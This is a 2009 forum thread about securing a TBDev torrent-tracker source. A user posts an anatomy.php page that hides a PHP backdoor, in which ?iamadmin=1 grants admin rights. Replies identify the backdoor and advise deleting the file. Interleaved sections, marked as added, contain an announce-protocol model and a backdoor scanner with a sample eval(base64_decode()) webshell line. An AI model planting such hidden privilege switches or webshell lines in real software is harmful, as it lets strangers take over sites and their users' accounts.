Bravo List

Thread: security, in the TBDev forum (http://www.bvlist.com/showthread.php?t=3100)

tunad 28th July 2009 13:26

security

Can anyone tell me how to secure this source?
I had a TBDev source and someone made fun of me.

Please help.

wMan 28th July 2009 16:57

What version? Modded like xzone? How old is it really?

sammygo 28th July 2009 17:02

Quote:

Originally Posted by wolfman (Post 13793)
What version? Modded like xzone? How old is it really?

I think it is Xzone 100% =)) !

wMan 28th July 2009 17:05

I have secured that piece of shit, but that source is the reason why TBDev is still making new releases (that code sucks, from the core through to the modding).

NetM 1.5 is pretty old; we have Netmaniack 1.6 available here.

tunad 28th July 2009 17:09

security

I have tbdev.net (Netmaniack's edition) 1.5.

How can I secure it???

Please help.

wMan 28th July 2009 17:13

Quote:

Originally Posted by tunad (Post 13796)
I have tbdev.net (Netmaniack's edition) 1.5.

How can I secure it???

Please help.

Look for security mods on tbdev.net.
What problem exactly did you have?

sammygo 28th July 2009 17:19

Quote:

Originally Posted by wolfman (Post 13797)
Look for security mods on tbdev.net.

Netmaniak... hmm.
Better go and download tbdev 1-1-2008!

wMan 28th July 2009 17:22

Quote:

Originally Posted by ionutzsami (Post 13798)
Netmaniak... hmm.
Better go and download tbdev 1-1-2008!

I would say Bigjoos' modded one is better :D

http://bvlist.com/codex-creations-installer-bigjoos

tunad 28th July 2009 18:13

Quote:

Originally Posted by wolfman (Post 13797)
Look for security mods on tbdev.net.
What problem exactly did you have?

Someone managed to access functions: he created new users, wrote anything he wanted, deleted users, deleted torrents.

How can I prevent that?

wMan 28th July 2009 18:17

Quote:

Originally Posted by tunad (Post 13800)
Someone managed to access functions: he created new users, wrote anything he wanted, deleted users, deleted torrents.

How can I prevent that?

Open up your anatomy.php, copy all of it and paste it here :D :smack:

tunad 28th July 2009 18:45

PHP Code:

<?php

require "include/bittorrent.php";

dbconn(false);
stdhead("Torrent anatomy");
?>
<table class=main width=750 border=0 cellspacing=0 cellpadding=0><tr><td class=embedded>
<h2>Anatomy of a torrent session </h2>
<table width=100% border=1 cellspacing=0 cellpadding=10><tr><td class=text>

<em>(Updated to reflect the tracker changes. 14-04-2004)</em>

There seems to be a lot of confusion about how the statistics updates work. The following is a capture of a full
session to see what's going on behind the scenes. The client communicates with the tracker via simple HTTP GET commands. The very first in this case was:

<code>GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F&peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=0&downloaded=0&left=753690875&event=started</code>

Let's dissect this:

• <b>info_hash</b> is just the hash identifying the torrent in question;
• <b>peer_id</b>, as the name suggests, identifies the client (the S588 part identifies Shad0w's 5.8.8, the rest is random);
• <b>port</b> just tells the tracker which port the client will listen on for incoming connections;
• <b>uploaded</b>=0; (this and the following are the relevant ones, and are self-explanatory)
• <b>downloaded</b>=0;
• <b>left</b>=753690875 (how much is left);
• <b>event=started</b> (telling the tracker that the client has just started).

Notice that the client IP doesn't show up here (although it can be sent by the client if it is configured to do so).
It's up to the tracker to see it and associate it with the user_id.
(Server replies will be omitted; they're just lists of peer IPs and respective ports.)
At this stage the user's profile will be listing this torrent as being leeched.

From now on the client will keep sending GETs to the tracker. We show only the first one as an example:

<code>GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F&peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=67960832&downloaded=40828928&left=715417851&numwant=0</code>

("numwant" is how the client tells the tracker how many new peers it wants, in this case 0.)

As you can see, at this stage the user had uploaded approx. 68MB and downloaded approx. 40MB. Whenever the tracker receives
these GETs it updates both the stats relative to the 'currently leeching/seeding' boxes and the total user upload/download stats. These intermediate GETs will be sent either periodically (every 15 min
or so, depending on the client and tracker) or when you force a manual announce in the client.

Finally, when the client was closed it sent

<code>GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F&peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=754384896&downloaded=754215163&left=0&numwant=0&event=completed</code>

Notice the all-important "event=completed". It is at this stage that the torrent will be removed from the user's profile.
If for some reason (tracker down, lost connection, bad client, crash, ...) this last GET doesn't reach
the tracker, this torrent will still be seen in the user profile until some tracker timeout occurs. It should be stressed that this message will be sent only when
closing the client properly, not when the download is finished. (The tracker will start listing
a torrent as 'currently seeding' after it receives a GET with left=0.)

There's a further message that causes the torrent to be removed from the user's profile,
namely "event=stopped". This is usually sent
when stopping in the middle of a download, e.g. by pressing 'Cancel' in Shad0w's.

One last note: some clients have a pause/resume option. This will <b>not</b> send any message to the server.
Do not use it as a way of updating stats more often; it just doesn't work. (Checked for Shad0w's 5.8.11 and ABC 2.6.5.)

</td></tr></table>
</td></tr></table>

<?php
// Backdoor: any logged-in user who requests anatomy.php?iamadmin=1 gets their
// own account set to class 9 (treated as site admin by this source).
// No class check, no confirmation, nothing logged.
if ($_GET["iamadmin"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` = $tagat") or sqlerr(__FILE__, __LINE__);
    print("Now you are one of site admins :D");
}
// Companion switch: anatomy.php?back=1 drops the account to class 0 again,
// so the promotion leaves no lasting trace in the user list once the visitor is done.
if ($_GET["back"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` = $tagat") or sqlerr(__FILE__, __LINE__);
    print("Your class now is 0 :(");
}
stdfoot();
?>

This is my anatomy.php.
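The announce sequence that the anatomy.php text walks through (started, periodic updates, then completed or stopped) as a runnable model. This is an added example, not code from the thread or from TBDev: the three query strings are the ones captured on the page, while the tracker-side bookkeeping is an assumption about what the page describes rather than the TBDev implementation. The assumed rules are that the user is keyed by a caller-supplied user_id (the page only says the tracker must associate the client IP with a user), that the user's totals are credited with the difference between consecutive announces of the same peer (counters restart at 0 with event=started), and that a counter shrinking mid-session is rejected.

```python
"""Added example, not from the thread or from TBDev: a small model of the
announce handling the anatomy.php text describes.  Only the three captured
query strings come from the page; the tracker bookkeeping is an assumption."""
from urllib.parse import urlsplit, unquote_to_bytes

# The three announces captured in the anatomy.php text (line-wrap spaces removed).
CAPTURED_SESSION = [
    "/announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F"
    "&peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=0&downloaded=0"
    "&left=753690875&event=started",
    "/announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F"
    "&peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=67960832"
    "&downloaded=40828928&left=715417851&numwant=0",
    "/announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F"
    "&peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=754384896"
    "&downloaded=754215163&left=0&numwant=0&event=completed",
]


def parse_announce(path):
    """Split the announce query into raw byte values and validate the basics.

    info_hash and peer_id are binary, so the text-oriented parse_qs must not
    be used; unquote_to_bytes keeps the exact 20 bytes the client sent.
    """
    params = {}
    for pair in urlsplit(path).query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[key] = unquote_to_bytes(value)
    if len(params.get("info_hash", b"")) != 20 or len(params.get("peer_id", b"")) != 20:
        raise ValueError("info_hash and peer_id must each be exactly 20 bytes")
    for name in ("port", "uploaded", "downloaded", "left"):
        if not params.get(name, b"0").isdigit():
            raise ValueError(f"{name} must be a non-negative integer")
    if not 0 < int(params.get("port", b"0")) < 65536:
        raise ValueError("port out of range")
    return params


class Tracker:
    """Per-peer session state plus per-user totals, following the page's rules:
    listed as leeching from 'started', as seeding once left=0, removed from the
    profile on 'completed' or 'stopped'."""

    def __init__(self):
        self.peers = {}  # (info_hash, peer_id) -> last reported counters
        self.users = {}  # user_id -> totals and the torrents shown on the profile

    def announce(self, user_id, path):
        p = parse_announce(path)
        info_hash = p["info_hash"]
        key = (info_hash, p["peer_id"])
        uploaded = int(p.get("uploaded", b"0"))
        downloaded = int(p.get("downloaded", b"0"))
        left = int(p.get("left", b"0"))
        event = p.get("event", b"").decode("ascii", "replace")
        user = self.users.setdefault(
            user_id, {"uploaded": 0, "downloaded": 0, "leeching": set(), "seeding": set()})

        # Counters are cumulative within one client session and restart at 0 with
        # event=started, so the user is credited with the delta since the last announce.
        prev = self.peers.get(key)
        if event == "started" or prev is None:
            prev = {"uploaded": 0, "downloaded": 0}
        if uploaded < prev["uploaded"] or downloaded < prev["downloaded"]:
            # Assumed sanity check: a counter that shrinks mid-session cannot be a
            # continuation of this session, so the announce is dropped.
            raise ValueError("cumulative counters decreased within a session")
        user["uploaded"] += uploaded - prev["uploaded"]
        user["downloaded"] += downloaded - prev["downloaded"]

        if event in ("completed", "stopped"):
            # Both events take the torrent off the user's profile (page text).
            self.peers.pop(key, None)
            user["leeching"].discard(info_hash)
            user["seeding"].discard(info_hash)
            return "removed"
        self.peers[key] = {"uploaded": uploaded, "downloaded": downloaded, "left": left}
        if left == 0:
            user["leeching"].discard(info_hash)
            user["seeding"].add(info_hash)
            return "seeding"
        user["seeding"].discard(info_hash)
        user["leeching"].add(info_hash)
        return "leeching"


def replay_captured_session(user_id=42):
    """Feed the page's three announces through the model for one assumed user id."""
    tracker = Tracker()
    states = [tracker.announce(user_id, path) for path in CAPTURED_SESSION]
    return states, tracker.users[user_id]


if __name__ == "__main__":
    states, totals = replay_captured_session()
    print(parse_announce(CAPTURED_SESSION[0])["info_hash"].hex())
    print(states, totals["uploaded"], totals["downloaded"])
```

Replaying the captured session lists the torrent as leeching after the first two announces and removes it on event=completed, with the user's totals ending at exactly the last reported uploaded and downloaded values, which is what the delta rule must produce if the counters are cumulative.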

wMan 28th July 2009 18:57

Quote:

Originally Posted by tunad (Post 13804)
This is my anatomy.php.

Ban users with white usernames and replace anatomy.php with this:

PHP Code:

<?php
// Every direct request to anatomy.php has "anatomy.php" in PHP_SELF, so this
// die() ends the page before anything below runs. (eregi() is deprecated since
// PHP 5.3; preg_match() with the /i modifier is the modern equivalent.)
if (eregi("anatomy.php", $_SERVER["PHP_SELF"])) die("wtf u are trying to do bich ? fixed by wolfman");
require "include/bittorrent.php";
dbconn(false);
stdhead("Torrent anatomy");
?>

Anatomy of a torrent session

(Updated to reflect the tracker changes. 14-04-2004)

There seems to be a lot of confusion about how the statistics updates work. The following is a capture of a full
session to see what's going on behind the scenes. The client communicates with the tracker via simple HTTP GET commands. The very first in this case was:

GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F&peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=0&downloaded=0&left=753690875&event=started

Let's dissect this:

3v0 28th July 2009 19:01

Just remove anatomy.php; it really isn't needed.

sammygo 28th July 2009 19:02

Code:

if ($_GET["iamadmin"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` = $tagat") or sqlerr(__FILE__, __LINE__);
    print("Now you are one of site admins :D");
}
if ($_GET["back"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` = $tagat") or sqlerr(__FILE__, __LINE__);
    print("Your class now is 0 :(");
}

Change to:

Code:

// Turns the backdoor into a trap: whoever requests ?iamadmin=1 or ?back=1
// disables their own account instead of being promoted.
if ($_GET["iamadmin"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` = $tagat") or sqlerr(__FILE__, __LINE__);
    print("Now you are Banned :D");
}
if ($_GET["back"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` = $tagat") or sqlerr(__FILE__, __LINE__);
    print("Now you are Banned :D");
}



tunad 28th July 2009 19:03

Thank you very much!!!!!

I hope this is all I have to do.

wMan 28th July 2009 19:09

Quote:

Originally Posted by ionutzsami (Post 13808)
Change to:
Code:

if ($_GET["iamadmin"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` = $tagat") or sqlerr(__FILE__, __LINE__);
    print("Now you are Banned :D");
}
if ($_GET["back"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` = $tagat") or sqlerr(__FILE__, __LINE__);
    print("Now you are Banned :D");
}

You can still hack it while shit like $_GET["iamadmin"] is in there somewhere.
Either remove anatomy.php or change it to one without this crap.
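The point made above, that the site stays exposed as long as a request-parameter switch like $_GET["iamadmin"] survives anywhere in the tree, is worth checking mechanically before trusting a downloaded source. The script below is an added example, not code from the thread or from TBDev: it scans a set of PHP files for the shape of this backdoor (an UPDATE of users.class or users.enabled in a file with no visible class check) and for the usual drop-in payload calls, and lists every request key each file reads so that odd names stand out. The sample files are constructed inline: anatomy.php reproduces the thread's backdoor, the other two are invented, and the rules are triage heuristics (assumed TBDev idioms such as UC_MODERATOR and get_user_class() count as an authorization check), not a proof that nothing else is hidden.

```python
"""Added example, not from the thread or from TBDev: a triage scan for the
anatomy.php style of PHP backdoor.  Sample files are constructed inline."""
import re
from dataclasses import dataclass

# Request parameters the file reads: $_GET["iamadmin"], $_POST['userid'], ...
REQUEST_PARAM = re.compile(r"""\$_(?:GET|POST|REQUEST|COOKIE)\[\s*["']([^"']+)["']\s*\]""")
# SQL that changes an account's privilege or status.
PRIV_WRITE = re.compile(
    r"UPDATE\s+`?users`?\s+SET\s+.*?`?(class|enabled|passhash|secret|passkey)`?\s*=", re.I)
# Assumed TBDev authorization idioms; a file with a PRIV_WRITE and none of these is suspect.
AUTH_CHECK = re.compile(
    r"""UC_(?:SYSOP|ADMINISTRATOR|MODERATOR)|get_user_class\(|\$CURUSER\[\s*["']class["']\s*\]\s*[<>=!]""")
# Classic drop-in payload calls.
DANGEROUS_CALL = re.compile(r"\b(?:eval|assert|base64_decode|system|passthru|shell_exec|exec)\s*\(")

SAMPLE_FILES = {
    # The thread's backdoor, trimmed to the PHP part.
    "anatomy.php": """<?php
require "include/bittorrent.php";
dbconn(false);
stdhead("Torrent anatomy");
// ... HTML page body omitted ...
if ($_GET["iamadmin"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` = $tagat") or sqlerr(__FILE__, __LINE__);
}
if ($_GET["back"]) {
    $tagat = $CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` = $tagat") or sqlerr(__FILE__, __LINE__);
}
stdfoot();
""",
    # Constructed legitimate moderator page: the same kind of UPDATE, gated on class.
    "modtask.php": """<?php
require "include/bittorrent.php";
dbconn();
if (get_user_class() < UC_MODERATOR)
    permissiondenied();
$userid = 0 + $_POST["userid"];
mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `id` = $userid") or sqlerr(__FILE__, __LINE__);
""",
    # Constructed one-liner of the eval(base64_decode()) family.
    "sample_include.php": """<?php
// helper functions
if (isset($_REQUEST["c"])) eval(base64_decode($_REQUEST["c"]));
""",
}


@dataclass(frozen=True)
class Finding:
    file: str
    line: int
    rule: str
    evidence: str


def request_keys(source):
    """Every request parameter name the file reads, so names like 'iamadmin' stand out."""
    return sorted(set(REQUEST_PARAM.findall(source)))


def scan_source(name, source):
    """Flag privilege writes in files with no visible class check, plus payload calls.

    The authorization check is looked for anywhere in the file, which is coarse:
    it is a triage rule to shortlist files for reading, not a verdict.
    """
    findings = []
    has_auth_check = AUTH_CHECK.search(source) is not None
    for number, line in enumerate(source.splitlines(), 1):
        if PRIV_WRITE.search(line) and not has_auth_check:
            findings.append(Finding(name, number, "privilege-write-without-auth-check", line.strip()))
        if DANGEROUS_CALL.search(line):
            findings.append(Finding(name, number, "dangerous-call", line.strip()))
    return findings


def scan_all(files=SAMPLE_FILES):
    return [f for name, src in files.items() for f in scan_source(name, src)]


if __name__ == "__main__":
    for name, src in SAMPLE_FILES.items():
        print(f"{name}: reads {request_keys(src)}")
    for f in scan_all():
        print(f"{f.file}:{f.line} [{f.rule}] {f.evidence}")
```

On the samples the scan reports both class writes in anatomy.php and the eval() in the constructed include, and stays quiet on the moderator page because its UPDATE sits behind a class check. Pointing the same two regexes at a real tree is one grep away; the request-key listing is the part that catches switches with innocuous-looking names that no signature would match.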

tunad 28th July 2009 19:18

So all I have to do is delete anatomy.php, OK?

wMan 28th July 2009 19:19

Quote:

Originally Posted by tunad (Post 13811)
So all I have to do is delete anatomy.php, OK?

Yes.

tunad 28th July 2009 19:27

I installed the source, but now uTorrent shows me "tracker sending invalid data"... why??

wMan 28th July 2009 19:35

Quote:

Originally Posted by tunad (Post 13813)
I installed the source, but now uTorrent shows me "tracker sending invalid data"... why??

Because you use a source that had a backdoor in it.
Do you really think you will get it to work?

There are so many other good sources, you know.

tunad 28th July 2009 19:38

Please tell me what I should use.

Fynnon 28th July 2009 20:53

Quote:

Originally Posted by tunad (Post 13815)
Please tell me what I should use.

You could use phpMyBitTorrent, TorrentTrader or xBTiT, and maybe even the Codex-Creations Installer by BigJoos.


All times are GMT +2.